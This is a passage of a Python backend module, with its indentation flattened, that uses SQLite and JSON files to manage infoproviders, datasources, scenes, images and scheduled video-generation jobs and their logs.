return [{"schedule_historisation_id": row["schedule_historisation_id"], "type": row["type"]} for row in res]
def show_weekly():
"""
    Loads all entries of the 'schedule_historisation_weekday' table.
"""
con = db.open_con_f()
res = con.execute("SELECT * FROM schedule_historisation_weekday")
return [{"schedule_weekday_historisation_id": row["schedule_weekday_historisation_id"], "weekday": row["weekday"], "schedule_historisation_id": row["schedule_historisation_id"]} for row in res]
def get_infoprovider_file(infoprovider_id):
"""
    Generates the path to the file of a given infoprovider based on its ID.
    :param infoprovider_id: ID of the infoprovider.
    :type infoprovider_id: int
    :return: path to the JSON file of the infoprovider.
"""
con = db.open_con_f()
    # Load the name of the given infoprovider
res = con.execute("SELECT infoprovider_name FROM infoprovider WHERE infoprovider_id = ?",
[infoprovider_id]).fetchone()
con.commit()
return _get_infoprovider_path(res["infoprovider_name"].replace(" ", "-")) if res is not None else None
def get_datasource_file(datasource_id):
"""
    Loads the path to the JSON file of a given datasource.
    :param datasource_id: ID of the datasource.
    :type datasource_id: int
    :return: path to the JSON file of the datasource.
"""
con = db.open_con_f()
    # Load the name of the given datasource
datasource_name = con.execute("SELECT datasource_name FROM datasource WHERE datasource_id=?",
[datasource_id]).fetchone()["datasource_name"]
infoprovider_name = con.execute("SELECT infoprovider_name FROM infoprovider INNER JOIN datasource USING (infoprovider_id) WHERE datasource_id=?",
[datasource_id]).fetchone()["infoprovider_name"]
con.commit()
return _get_datasource_path(infoprovider_name.replace(" ", "-") + "_" + datasource_name.replace(" ", "-")) if datasource_name is not None else None
def get_infoprovider_name(infoprovider_id):
"""
    Loads the name of an infoprovider from the database.
    :param infoprovider_id: ID of the infoprovider.
    :type infoprovider_id: int
"""
con = db.open_con_f()
    # Load the name of the given infoprovider
res = con.execute("SELECT infoprovider_name FROM infoprovider WHERE infoprovider_id = ?",
[infoprovider_id]).fetchone()
con.commit()
return res["infoprovider_name"].replace(" ", "-")
def get_infoprovider(infoprovider_id):
"""
    Loads an infoprovider based on its ID.
    :param infoprovider_id: ID of the infoprovider.
    :type infoprovider_id: int
    :return: the JSON file of the infoprovider.
"""
    # Load the JSON file of the infoprovider
with open_resource(get_infoprovider_file(infoprovider_id), "r") as f:
infoprovider_json = json.loads(f.read())
for datasource in infoprovider_json["datasources"]:
api_key_name = f"{infoprovider_json['name']}_{datasource['datasource_name']}_APIKEY" if datasource["api"]["method"] != "noAuth" and datasource["api"]["method"] != "BasicAuth" else None
private_config = get_private()
if api_key_name:
datasource["api"]["api_info"]["api_key_name"] += private_config["api_keys"][api_key_name]
return {
"infoprovider_name": infoprovider_json["name"],
"datasources": infoprovider_json["datasources"],
"diagrams": infoprovider_json["images"],
"diagrams_original": infoprovider_json["diagrams_original"],
"arrays_used_in_diagrams": infoprovider_json["arrays_used_in_diagrams"]
}
def update_infoprovider(infoprovider_id, updated_data):
"""
    Updates the data of an infoprovider.
    :param infoprovider_id: ID of the infoprovider.
    :type infoprovider_id: int
    :param updated_data: the new data the infoprovider should be overwritten with.
    :type updated_data: dict
    :return: information about the error in case something went wrong.
"""
con = db.open_con_f()
assert_private_exists()
new_transform = []
    # Check whether the new infoprovider name is already used by another infoprovider
count = con.execute("SELECT COUNT(*) FROM infoprovider WHERE infoprovider_name=?",
[updated_data["infoprovider_name"]]).fetchone()["COUNT(*)"]
old_infoprovider_name = con.execute("SELECT infoprovider_name FROM infoprovider WHERE infoprovider_id=?",
[infoprovider_id]).fetchone()["infoprovider_name"]
con.commit()
if count > 0 and old_infoprovider_name != updated_data["infoprovider_name"]:
return {"err_msg": f"There already exists an infoprovider with the name {updated_data['infoprovider_name']}"}
    # Load the infoprovider JSON
old_file_path = _get_infoprovider_path(old_infoprovider_name)
with open_resource(old_file_path, "r") as f:
infoprovider_json = json.loads(f.read())
if old_infoprovider_name != updated_data["infoprovider_name"]:
os.remove(old_file_path)
    # Set the new infoprovider name
con.execute("UPDATE infoprovider SET infoprovider_name =? WHERE infoprovider_id=?",
[updated_data["infoprovider_name"], infoprovider_id])
    # Prepare the updated api step
api_step_new = {
"type": "request_multiple_custom",
"use_loop_as_key": True,
"steps_value": [],
"requests": []
}
datasources = copy.deepcopy(updated_data["datasources"])
for datasource in datasources:
api_key_name = f"{updated_data['infoprovider_name']}_{datasource['datasource_name']}_APIKEY" if datasource["api"]["method"] != "noAuth" and datasource["api"]["method"] != "BasicAuth" else None
header, parameter = generate_request_dicts(datasource["api"]["api_info"], datasource["api"]["method"], api_key_name=api_key_name)
url, params = update_url_pattern(datasource["api"]["api_info"]["url_pattern"])
parameter.update(params)
req_data = {
"type": datasource["api"]["api_info"]["type"],
"method": datasource["api"]["api_info"].get("method", "GET"),
"url_pattern": url,
"headers": header,
"params": parameter,
"response_type": datasource["api"]["response_type"]
}
if api_key_name:
req_data.update({"api_key_name": api_key_name})
api_step_new["steps_value"].append(datasource["datasource_name"])
api_step_new["requests"].append(req_data)
    # Prepare the updated transform step
new_transform = []
for datasource in datasources:
new_transform += datasource["calculates"]
custom_keys = _extract_custom_keys(datasource["calculates"], datasource["formulas"], datasource["replacements"])
new_transform = _generate_transform(_extend_formula_keys(datasource["formulas"], datasource["datasource_name"], custom_keys), remove_toplevel_key(new_transform))
new_transform += datasource["replacements"]
datasources_copy = deepcopy(updated_data["datasources"])
for datasource in datasources_copy:
api_key_name_temp = datasource["api"]["api_info"].get("api_key_name", None)
if api_key_name_temp:
datasource["api"]["api_info"]["api_key_name"] = api_key_name_temp.split("||")[0] + "||"
if new_transform is None:
return {"err_msg": "could not generate transform-step from formulas"}
    # Update the contents of the JSON
infoprovider_json.update({"name": updated_data["infoprovider_name"]})
infoprovider_json.update({"api": api_step_new})
infoprovider_json.update({"transform": new_transform})
infoprovider_json.update({"images": deepcopy(remove_toplevel_key(updated_data["diagrams"]))})
infoprovider_json.update({"diagrams_original": updated_data["diagrams_original"]})
infoprovider_json.update({"datasources": datasources_copy})
shutil.rmtree(os.path.join(TEMP_LOCATION, old_infoprovider_name), ignore_errors=True)
for diagram_name, diagram in updated_data["diagrams"].items():
generate_test_diagram(diagram, infoprovider_name=updated_data["infoprovider_name"], diagram_name=diagram_name)
_remove_datasources(con, infoprovider_id, datasource_names=[x["datasource_name"] for x in updated_data["datasources"]])
for datasource in updated_data["datasources"]:
datasource_name = datasource["datasource_name"]
api_key_name = f"{updated_data['infoprovider_name']}_{datasource['datasource_name']}_APIKEY" if datasource["api"]["method"] != "noAuth" and datasource["api"]["method"] != "BasicAuth" else None
header, parameter = generate_request_dicts(datasource["api"]["api_info"], datasource["api"]["method"], api_key_name=api_key_name)
url, params = update_url_pattern(datasource["api"]["api_info"]["url_pattern"])
parameter.update(params)
req_data = {
"type": datasource["api"]["api_info"]["type"],
"method": datasource["api"]["api_info"].get("method", "GET"),
"url_pattern": url,
"headers": header,
"params": parameter,
"response_type": datasource["api"]["response_type"]
}
if api_key_name:
req_data.update({"api_key_name": api_key_name})
datasource_api_step = {
"type": "request_multiple_custom",
"use_loop_as_key": True,
"steps_value": [datasource_name],
"requests": [req_data]
}
        # Prepare the datasource object
transform_step = []
transform_step += datasource["transform"]
transform_step += datasource["calculates"]
formulas = copy.deepcopy(datasource["formulas"])
custom_keys = _extract_custom_keys(datasource["calculates"], datasource["formulas"], datasource["replacements"])
transform_step = _generate_transform(_extend_formula_keys(formulas, datasource_name, custom_keys),
remove_toplevel_key(transform_step))
transform_step += remove_toplevel_key(datasource["replacements"])
datasource_json = {
"name": datasource_name,
"api": datasource_api_step,
"transform": transform_step,
"storing": _generate_storing(datasource["historized_data"], datasource_name, custom_keys, datasource["storing"]) if datasource["api"]["api_info"]["type"] != "request_memory" else [],
"run_config": {}
}
if len(datasource_json["storing"]) > 0 and datasource["api"]["api_info"]["type"] != "request_memory":
            # Store the historisation schedule for the datasource
schedule_historisation = datasource["schedule"]
schedule_historisation_id = _insert_historisation_schedule(con, schedule_historisation)
            # Store the datasource in the database
con.execute("INSERT INTO datasource (datasource_name, schedule_historisation_id, infoprovider_id)"
" VALUES (?, ?, ?)",
[datasource_name, schedule_historisation_id, infoprovider_id])
# add request memory, if datasource stores data
use_last = get_max_use_last(infoprovider_json["images"])
for storing_config in datasource_json["storing"]:
datasource_json["api"]["steps_value"].append(f"{datasource_json['name']}_{storing_config['key'].replace('_req|', '').replace('|', '_')}_HISTORY")
datasource_json["api"]["requests"].append({
"type": "request_memory",
"name": dict(storing_config)["name"],
"memory_folder": updated_data["infoprovider_name"] + "_" + datasource_name,
"use_last": use_last,
"alternative": {
"type": "input",
"data": [-1 for _ in range(use_last)]
}
})
else:
con.execute("INSERT INTO datasource (datasource_name, infoprovider_id) VALUES (?, ?)",
[datasource_name, infoprovider_id])
        # Save the datasource JSON to the "/datasources" folder
with open_resource(_get_datasource_path(updated_data["infoprovider_name"].replace(" ", "-") + "_" + datasource_name.replace(" ", "-")), "wt") as f:
json.dump(datasource_json, f)
    # Save the new JSON
new_file_path = get_infoprovider_file(infoprovider_id)
with open_resource(new_file_path, "w") as f:
json.dump(infoprovider_json, f)
con.commit()
return None
def get_max_use_last(diagrams=None):
"""
    Determines the maximum number of historized values a datasource needs to keep.
    All potential configurations that access historized data are searched for this.
    :param diagrams: list of diagrams.
    :type diagrams: list
    :return: index of the oldest historized value that is still referenced.
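    Example (hypothetical diagram config): if the largest x-index used by any "Historized" plot is 4,
    the function returns 5, i.e. the last five stored values have to be requested from memory.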
"""
max_use_last = 0
if diagrams:
for k, v in diagrams.items():
temp_max = 0
if v["diagram_config"]["sourceType"] == "Historized":
for plot in v["diagram_config"]["plots"]:
max_x = max(plot["plot"]["x"])
if max_x > temp_max:
temp_max = max_x
if temp_max > max_use_last:
max_use_last = temp_max
return max_use_last + 1
def delete_infoprovider(infoprovider_id):
"""
    Removes the infoprovider with the given ID.
    :param infoprovider_id: ID of the infoprovider.
    :type infoprovider_id: int
    :return: boolean value indicating whether the deletion was successful.
"""
con = db.open_con_f()
    # Check whether the infoprovider exists
res = con.execute("SELECT * FROM infoprovider WHERE infoprovider_id = ?",
[infoprovider_id]).fetchone()
if res is not None:
        # Delete the JSON files of the datasources as well as the corresponding database entries
_remove_datasources(con, infoprovider_id, remove_historised=True)
        # Delete the JSON file of the infoprovider and its folders
file_path = get_infoprovider_file(infoprovider_id)
shutil.rmtree(os.path.join(TEMP_LOCATION, res["infoprovider_name"]), ignore_errors=True)
shutil.rmtree(os.path.join(IMAGE_LOCATION, res["infoprovider_name"]), ignore_errors=True)
os.remove(file_path)
        # Delete scenes and videos that use this infoprovider
scenes = con.execute("SELECT * FROM scene_uses_infoprovider WHERE infoprovider_id=?", [infoprovider_id])
for scene in scenes:
delete_scene(scene["scene_id"])
        # Delete the infoprovider from the database
con.execute("DELETE FROM infoprovider WHERE infoprovider_id = ?", [infoprovider_id])
con.commit()
return True
con.commit()
return False
def get_infoprovider_logs(infoprovider_id):
"""
    Loads the logs of all datasources that belong to a given infoprovider.
    :param infoprovider_id: ID of an infoprovider.
    :type infoprovider_id: int
    :return: list of all logs found.
"""
con = db.open_con_f()
datasource_ids = con.execute("SELECT datasource_id FROM datasource WHERE infoprovider_id=?", [infoprovider_id])
logs = []
for datasource_id in datasource_ids:
datasource_logs = con.execute("SELECT job_id, datasource_name, state, error_msg, error_traceback, duration, start_time "
"from job_logs INNER JOIN datasource ON job_logs.job_id=datasource.datasource_id "
"WHERE pipeline_type='DATASOURCE' AND datasource.datasource_id=?"
"ORDER BY job_logs_id DESC", [datasource_id["datasource_id"]]).fetchall()
[logs.append({
"object_id": datasource_log["job_id"],
"object_name": datasource_log["datasource_name"],
"state": datasource_log["state"],
"errorMsg": datasource_log["error_msg"] if datasource_log["error_msg"] else "successful",
"errorTraceback": datasource_log["error_traceback"],
"duration": datasource_log["duration"],
"startTime": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(datasource_log["start_time"]))
}) for datasource_log in datasource_logs]
return logs
def get_videojob_logs(videojob_id):
"""
    Loads the logs of a given video job.
    :param videojob_id: ID of a video job.
    :type videojob_id: int
    :return: list of all logs found.
"""
con = db.open_con_f()
logs = con.execute("SELECT job_id, job_name, state, error_msg, error_traceback, duration, start_time "
"from job_logs INNER JOIN job USING (job_id) "
"WHERE pipeline_type='JOB' AND job_id=?"
"ORDER BY job_logs_id DESC", [videojob_id]).fetchall()
return [{
"object_id": log["job_id"],
"object_name": log["job_name"],
"state": log["state"],
"errorMsg": log["error_msg"] if log["error_msg"] else "successful",
"errorTraceback": log["error_traceback"],
"duration": log["duration"],
"startTime": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(log["start_time"]))
} for log in logs]
def get_all_videojobs():
"""
    Loads information about all video jobs.
    :return: contains the keys 'videojob_id' and 'videojob_name' for every video job in the database.
"""
con = db.open_con_f()
jobs = con.execute("SELECT job_id, job_name FROM job").fetchall()
return [{
"videojob_id": job["job_id"],
"videojob_name": job["job_name"]
} for job in jobs] if jobs else []
def delete_videojob(videojob_id):
"""
    Removes the video job with the given ID.
    :param videojob_id: ID of the video job.
    :type videojob_id: int
    :return: boolean value indicating whether the deletion was successful.
"""
con = db.open_con_f()
job_list = get_job_list()
topic_id = list(filter(lambda x: x["jobId"] == videojob_id, job_list))[0]["topicValues"][0]["topicId"]
delete_topic(topic_id)
delete_job(videojob_id)
con.execute("DELETE FROM job_uses_scene WHERE job_id=?", [videojob_id])
con.commit()
return True
def get_videojob_preview(videojob_id):
"""
    Generates the path to the preview image of a video job.
    :param videojob_id: ID of the video job.
    :type videojob_id: int
    :return: file path to the preview image.
"""
con = db.open_con_f()
scene = con.execute("SELECT * FROM job_uses_scene WHERE job_id=? AND scene_is_preview=TRUE",
[videojob_id]).fetchone()
return get_scene_preview(scene["scene_id"]) if scene else None
def insert_scene(scene):
"""
    Adds a scene to the database and creates a corresponding JSON file.
    :param scene: JSON object describing the scene. Contains the keys 'scene_name', 'used_images',
                  'used_infoproviders', 'images', 'backgroundImage', 'backgroundType', 'backgroundColor',
                  'backgroundColorEnabled', 'itemCounter' and 'scene_items'.
    :type scene: dict
    :return: contains information about the error in case something went wrong.
"""
con = db.open_con_f()
scene_name = scene["scene_name"].lower()
used_images = scene["used_images"]
used_infoproviders = scene["used_infoproviders"]
images = scene["images"]
scene_items = scene["scene_items"]
scene_json = {
"name": scene_name,
"used_images": used_images,
"used_infoproviders": used_infoproviders,
"images": remove_toplevel_key(images),
"backgroundImage": scene["backgroundImage"],
"backgroundType": scene["backgroundType"],
"backgroundColor": scene["backgroundColor"],
"backgroundColorEnabled": scene["backgroundColorEnabled"],
"itemCounter": scene["itemCounter"],
"scene_items": scene_items
}
    # Check whether the scene already exists
count = con.execute("SELECT COUNT(*) FROM scene WHERE scene_name=?", [scene_name]).fetchone()["COUNT(*)"]
if count > 0:
return "given name already in use"
# insert into scene
scene_id = con.execute("INSERT INTO scene (scene_name) VALUES (?)", [scene_name]).lastrowid
# insert into scene_uses_image
for used_image in used_images:
# check if image exists
count = con.execute("SELECT COUNT(*) FROM image WHERE image_id=?", [used_image]).fetchone()["COUNT(*)"]
if count == 0:
return f"image with id {used_image} does not exist"
con.execute("INSERT INTO scene_uses_image (scene_id, image_id) VALUES (?, ?)", [scene_id, used_image])
# insert into scene_uses_infoprovider
for used_infoprovider in used_infoproviders:
# check if infoprovider exists
count = con.execute("SELECT COUNT(*) FROM infoprovider WHERE infoprovider_id=?", [used_infoprovider]).fetchone()["COUNT(*)"]
if count == 0:
return f"infoprovider with id {used_infoprovider} does not exist"
con.execute("INSERT INTO scene_uses_infoprovider (scene_id, infoprovider_id) VALUES (?, ?)", [scene_id, used_infoprovider])
# save <scene-name>.json
file_path = _get_scene_path(scene_name.replace(" ", "-"))
with open_resource(file_path, "wt") as f:
json.dump(scene_json, f)
con.commit()
return None
def get_scene_file(scene_id):
"""
    Generates the path to the JSON file of a scene based on its ID.
    :param scene_id: ID of the scene.
    :type scene_id: int
    :return: path to the JSON file.
"""
con = db.open_con_f()
res = con.execute("SELECT scene_name FROM scene WHERE scene_id=?", [scene_id]).fetchone()
con.commit()
return _get_scene_path(res["scene_name"]) if res is not None and not None else None
def get_scene(scene_id):
"""
    Loads the JSON file of the scene with the given ID.
    :param scene_id: ID of the scene.
    :type scene_id: int
    :return: JSON object of the scene file.
"""
file_path = get_scene_file(scene_id)
if file_path is None:
return None
with open_resource(file_path, "r") as f:
scene_json = json.loads(f.read())
return scene_json
def get_scene_list():
"""
    Loads information about all existing scenes.
    :return: a JSON object with the keys 'scene_id' and 'scene_name' for every scene.
"""
con = db.open_con_f()
res = con.execute("SELECT * FROM scene")
con.commit()
return [{"scene_id": row["scene_id"], "scene_name": row["scene_name"]} for row in res]
def update_scene(scene_id, updated_data):
"""
    Updates the JSON file and the database entries of a scene.
    :param scene_id: ID of the scene.
    :type scene_id: int
    :param updated_data: new data of the scene.
    :type updated_data: dict
    :return: contains information about the error in case something went wrong.
"""
con = db.open_con_f()
scene_name = updated_data["scene_name"]
used_images = updated_data["used_images"]
used_infoproviders = updated_data["used_infoproviders"]
images = updated_data["images"]
scene_items = updated_data["scene_items"]
    # Load the old JSON
old_file_path = get_scene_file(scene_id)
with open_resource(old_file_path, "r") as f:
scene_json = json.loads(f.read())
old_name = con.execute("SELECT scene_name FROM scene WHERE scene_id=?", [scene_id]).fetchone()["scene_name"]
    # Check whether the name is already used by another scene
res = con.execute("SELECT * FROM scene WHERE scene_name=?", [scene_name])
for row in res:
if row["scene_id"] != scene_id and scene_name != old_name:
return {"err_msg": f"There already exists a scene with the name {scene_name}"}
    # Set the new name
con.execute("UPDATE scene SET scene_name=? WHERE scene_id=?", [scene_name, scene_id])
    # Write the new data into the JSON file
scene_json.update({"name": scene_name})
scene_json.update({"used_images": used_images})
scene_json.update({"used_infoproviders": used_infoproviders})
scene_json.update({"images": remove_toplevel_key(images)})
scene_json.update({"backgroundImage": updated_data["backgroundImage"]})
scene_json.update({"backgroundType": updated_data["backgroundType"]})
scene_json.update({"backgroundColor": updated_data["backgroundColor"]})
scene_json.update({"backgroundColorEnabled": updated_data["backgroundColorEnabled"]})
scene_json.update({"itemCounter": updated_data["itemCounter"]})
scene_json.update({"scene_items": scene_items})
image_files = con.execute("SELECT image_name FROM scene_uses_image AS uses INNER JOIN image ON uses.image_id = image.image_id WHERE uses.scene_id = ? AND image.folder = ?", [scene_id, "scene"])
for image_file in image_files:
if re.search(".*[_preview|_background]\.[png|jpe?g]", image_file["image_name"]):
path = get_image_path(image_file["image_name"].rsplit(".", 1)[0], "scene",
image_file["image_name"].rsplit(".", 1)[1])
os.remove(path)
    # Remove old entries from scene_uses_image
con.execute("DELETE FROM scene_uses_image WHERE scene_id=?", [scene_id])
    # Remove old entries from scene_uses_infoprovider
con.execute("DELETE FROM scene_uses_infoprovider WHERE scene_id=?", [scene_id])
    # Insert new entries into scene_uses_image
for used_image in used_images:
        # Check whether the image exists in the table
count = con.execute("SELECT COUNT(*) FROM image WHERE image_id=?", [used_image]).fetchone()["COUNT(*)"]
if count == 0:
return {"err_msg": f"Image with ID {used_image} does not exist"}
        # Insert into scene_uses_image
con.execute("INSERT INTO scene_uses_image (scene_id, image_id) VALUES (?, ?)", [scene_id, used_image])
    # Insert new entries into scene_uses_infoprovider
for used_infoprovider in used_infoproviders:
        # Check whether the infoprovider exists in the table
count = con.execute("SELECT COUNT(*) FROM infoprovider WHERE infoprovider_id=?", [used_infoprovider]).fetchone()["COUNT(*)"]
if count == 0:
return {"err_msg": f"Infoprovider with ID {used_infoprovider} does not exist"}
        # Insert into scene_uses_infoprovider
con.execute("INSERT INTO scene_uses_infoprovider (scene_id, infoprovider_id) VALUES (?, ?)", [scene_id, used_infoprovider])
    # Save the new JSON
new_file_path = _get_scene_path(scene_name)
if new_file_path != old_file_path:
os.remove(old_file_path)
with open_resource(new_file_path, "w") as f:
json.dump(scene_json, f)
video_ids = [x["job_id"] for x in list(con.execute("SELECT * FROM job_uses_scene WHERE scene_id=?", [scene_id]))]
video_jsons = [get_videojob(x) for x in video_ids]
for index, video_json in enumerate(video_jsons):
video_scene_names = [x["sceneName"] for x in video_json["sceneList"]]
video_json["images"] = {f"{i}_{x}": {"key": x} for i, x in enumerate(video_scene_names)}
insert_video_job(video_json, True, video_ids[index])
con.commit()
return None
def delete_scene(scene_id):
"""
    Removes a scene from the database and deletes the corresponding JSON file.
    :param scene_id: ID of the scene.
    :type scene_id: int
    :return: indicates whether the deletion was successful.
"""
con = db.open_con_f()
    # Check whether the scene exists
res = con.execute("SELECT * FROM scene WHERE scene_id=?", [scene_id]).fetchone()
if res:
file_path = get_scene_file(scene_id)
image_files = con.execute("SELECT image_name FROM scene_uses_image AS uses INNER JOIN image ON uses.image_id = image.image_id WHERE uses.scene_id = ? AND image.folder = ?", [scene_id, "scene"])
for image_file in image_files:
if re.search(".*[_preview|_background]\.[png|jpe?g]", image_file["image_name"]):
path = get_image_path(image_file["image_name"].rsplit(".", 1)[0], "scene", image_file["image_name"].rsplit(".", 1)[1])
os.remove(path)
        # Remove the entry from scene_uses_image
con.execute("DELETE FROM scene_uses_image WHERE scene_id=?", [scene_id])
        # Remove the entry from scene_uses_infoprovider
con.execute("DELETE FROM scene_uses_infoprovider WHERE scene_id=?", [scene_id])
# Delete video jobs that use this scene
jobs = con.execute("SELECT * FROM job_uses_scene WHERE scene_id=?", [scene_id])
for job in jobs:
delete_videojob(job["job_id"])
# Delete the JSON file
rowcount = con.execute("DELETE FROM scene WHERE scene_id=?", [scene_id]).rowcount
if rowcount > 0:
os.remove(file_path)
con.commit()
return True
con.commit()
return False
def get_scene_preview(scene_id):
"""
Loads the preview image of a scene.
:param scene_id: ID of the scene.
:type scene_id: int
"""
con = db.open_con_f()
# Check whether the scene exists
count = con.execute("SELECT COUNT(*) FROM scene WHERE scene_id=?", [scene_id]).fetchone()["COUNT(*)"]
if count == 0:
return None
# Load the scene JSON to be able to read the images it uses
with open_resource(get_scene_file(scene_id)) as f:
scene_json = json.loads(f.read())
# Look for the preview image
for image_id in scene_json["used_images"]:
image_name = con.execute("SELECT image_name FROM image WHERE image_id=?", [image_id]).fetchone()["image_name"]
if "preview" in image_name:
image_data = image_name.rsplit(".", 1)
return get_image_path(image_data[0], "scene", image_data[1])
return None
def insert_image(image_name, folder):
"""
Adds an image to the database.
:param image_name: Name of the image.
:type image_name: str
:param folder: Folder under which the image should be stored.
:type folder: str
"""
con = db.open_con_f()
image_id = con.execute("INSERT INTO image (image_name, folder) VALUES (?, ?)", [image_name, folder]).lastrowid
con.commit()
return image_id
def get_scene_image_file(image_id):
"""
Generates the file path to an image based on its ID.
:param image_id: ID of the image.
:type image_id: int
"""
con = db.open_con_f()
res = con.execute("SELECT * FROM image WHERE image_id=?", [image_id]).fetchone()
con.commit()
return get_image_path(res["image_name"].rsplit(".", 1)[0], res["folder"], res["image_name"].rsplit(".", 1)[1]) if res is not None else None
def get_image_list(folder):
"""
Loads information about all images contained in the database.
:param folder: Folder whose images should be listed.
:type folder: str
:return: A list of objects, each containing the ID, the name and the file path of an image.
"""
con = db.open_con_f()
res = con.execute("SELECT * FROM image WHERE folder=?", [folder])
con.commit()
return [{"image_id": row["image_id"],
"image_name": row["image_name"],
"path": get_image_path(row["image_name"].rsplit(".", 1)[0], folder, row["image_name"].rsplit(".", 1)[1])} for row in res]
def delete_scene_image(image_id):
"""
Removes an image from the database.
:param image_id: ID of the image.
:type image_id: int
"""
con = db.open_con_f()
file_path = get_scene_image_file(image_id)
# Remove scenes and videos that use this image
res = con.execute("SELECT * FROM scene_uses_image WHERE image_id=?", [image_id])
for scene in res:
delete_scene(scene["scene_id"])
# Remove the file from the folder structure and the entry from the 'image' table
res = con.execute("DELETE FROM image WHERE image_id=?", [image_id])
if res.rowcount > 0:
os.remove(file_path)
con.commit()
return "Successful"
def set_videojob_preview(videojob_id, scene_id):
"""
Sets a given scene as the preview image of a video.
:param videojob_id: ID of a video job.
:type videojob_id: int
:param scene_id: ID of a scene.
:type scene_id: int
:return: An error message in JSON format, if any.
"""
con = db.open_con_f()
# Check whether the video job and the scene exist
scene = con.execute("SELECT * FROM scene WHERE scene_id=?", [scene_id]).fetchone()
videojob = con.execute("SELECT * FROM job WHERE job_id=?", [videojob_id]).fetchone()
if videojob is None:
return {"err_msg": f"Videojob with ID {videojob_id} does not exist"}
if scene is None:
return {"err_msg": f"Scene with ID {scene_id} does not exist"}
# Check whether a scene is already set as preview
count = con.execute("SELECT COUNT(*) FROM job_uses_scene WHERE job_id=? AND scene_is_preview=TRUE",
[videojob_id]).fetchone()["COUNT(*)"]
if count == 0:
con.execute("INSERT INTO job_uses_scene (job_id, scene_id, scene_is_preview) VALUES (?, ?, ?)",
[videojob_id, scene_id, True])
else:
con.execute("UPDATE job_uses_scene SET scene_id=? WHERE job_id=? AND scene_is_preview=TRUE",
[scene_id, videojob_id])
con.commit()
return None
def get_topic_names():
con = db.open_con_f()
res = con.execute("SELECT steps_id, steps_name, json_file_name FROM steps")
return [{"topicId": row["steps_id"], "topicName": row["steps_name"],
"topicInfo": _get_topic_info(row["json_file_name"])} for row in res]
def get_topic_file(topic_id):
con = db.open_con_f()
res = con.execute("SELECT json_file_name FROM steps WHERE steps_id = ?", [topic_id]).fetchone()
return _get_steps_path(res["json_file_name"].replace(".json", "")) if res is not None else None
def delete_topic(topic_id):
con = db.open_con_f()
file_path = get_topic_file(topic_id)
res = con.execute("DELETE FROM steps WHERE steps_id = ?", [topic_id])
con.commit()
if (res.rowcount > 0):
os.remove(file_path)
def add_topic_get_id(name, file_name):
con = db.open_con_f()
topic_id = con.execute("INSERT INTO steps (steps_name,json_file_name)VALUES (?, ?)",
[name, file_name]).lastrowid
con.commit()
return topic_id
def add_topic(name, file_name):
con = db.open_con_f()
con.execute("INSERT INTO steps (steps_name,json_file_name)VALUES (?, ?)",
[name, file_name])
con.commit()
def get_params(topic_id):
con = db.open_con_f()
res = con.execute("SELECT json_file_name FROM steps WHERE steps_id = ?", [topic_id]).fetchone()
if res is None:
return None
steps_json = _get_topic_steps(res["json_file_name"])
run_config = steps_json["run_config"]
return humps.camelize(_to_param_list(run_config))
def get_job_list():
con = db.open_con_f()
res = con.execute("""
SELECT
job_id, job_name,
schedule.type AS s_type, time, STRFTIME('%Y-%m-%d', date) as date, time_interval, next_execution,
delete_options.type AS d_type, days, hours, k_count, fix_names_count,
GROUP_CONCAT(DISTINCT weekday) AS weekdays,
COUNT(DISTINCT position_id) AS topic_count,
GROUP_CONCAT(DISTINCT steps.steps_id || "::" || steps_name || "::" || json_file_name || "::" || position) AS topic_positions,
GROUP_CONCAT(DISTINCT position || "::" || key || "::" || value || "::" || job_config.type) AS param_values
FROM job
INNER JOIN schedule USING (schedule_id)
LEFT JOIN schedule_weekday USING (schedule_id)
INNER JOIN delete_options USING (delete_options_id)
INNER JOIN job_topic_position USING (job_id)
LEFT JOIN job_config USING (position_id)
INNER JOIN steps USING (steps_id)
GROUP BY (job_id)
""")
return [_row_to_job(row) for row in res]
def insert_job(job, config=True):
con = db.open_con_f()
job_name = job["jobName"]
schedule = job["schedule"]
delete_schedule = job["deleteSchedule"]
topic_values = job["topicValues"]
schedule_id = _insert_schedule(con, schedule)
delete_options_id = _insert_delete_options(con, delete_schedule)
job_id = con.execute(
"INSERT INTO job(job_name, schedule_id, delete_options_id) "
"VALUES(?, ?, ?)",
[job_name, schedule_id, delete_options_id]).lastrowid
_insert_param_values(con, job_id, topic_values, config=config)
con.commit()
def delete_job(job_id):
con = db.open_con_f()
con.execute("PRAGMA foreign_keys = ON")
schedule_id = con.execute("SELECT schedule_id FROM job WHERE job_id=?", [job_id]).fetchone()["schedule_id"]
delete_options_id = con.execute("SELECT delete_options_id FROM job WHERE job_id=?", [job_id]).fetchone()[
"delete_options_id"]
con.execute("DELETE FROM schedule WHERE schedule_id=?", [schedule_id])
con.execute("DELETE FROM delete_options WHERE delete_options_id=?", [delete_options_id])
con.commit()
def update_job(job_id, updated_data, config=True):
con = db.open_con_f()
for key, value in updated_data.items():
if key == "jobName":
con.execute("UPDATE job SET job_name=? WHERE job_id=?", [value, job_id])
if key == "schedule":
old_schedule_id = con.execute("SELECT schedule_id FROM job WHERE job_id=?", [job_id]).fetchone()[
"schedule_id"]
con.execute("DELETE FROM schedule WHERE schedule_id=?", [old_schedule_id])
con.execute("DELETE FROM schedule_weekday WHERE schedule_id=?", [old_schedule_id])
schedule_id = _insert_schedule(con, value)
con.execute("UPDATE job SET schedule_id=? WHERE job_id=?", [schedule_id, job_id])
if key == "deleteSchedule":
old_delete_options_id = \
con.execute("SELECT delete_options_id FROM job WHERE job_id=?", [job_id]).fetchone()[
"delete_options_id"]
con.execute("DELETE FROM delete_options WHERE delete_options_id=?", [old_delete_options_id])
delete_options_id = _insert_delete_options(con, value)
con.execute("UPDATE job SET delete_options_id=? WHERE job_id=?", [delete_options_id, job_id])
if key == "topic_values":
pos_id_rows = con.execute("SELECT position_id FROM job_topic_position WHERE job_id=?", [job_id])
pos_ids = [(row["position_id"],) for row in pos_id_rows]
con.execute("DELETE FROM job_topic_position WHERE job_id=?", [job_id])
con.executemany("DELETE FROM job_config WHERE position_id=?", pos_ids)
_insert_param_values(con, job_id, value, config=config)
con.commit()
def get_logs():
con = db.open_con_f()
logs = con.execute(
"SELECT "
"job_id, job_name, state, error_msg, error_traceback, duration, start_time "
"from job_logs INNER JOIN job USING (job_id) "
"ORDER BY job_logs_id DESC").fetchall()
return [{
"jobId": log["job_id"],
"jobName": log["job_name"],
"state": log["state"],
"errorMsg": log["error_msg"],
"errorTraceback": log["error_traceback"],
"duration": log["duration"],
"startTime": log["start_time"]
}
for log in logs]
def generate_request_dicts(api_info, method, api_key_name=None):
"""
If the API requires a key, there are several ways in which the key can be passed in the request (query,
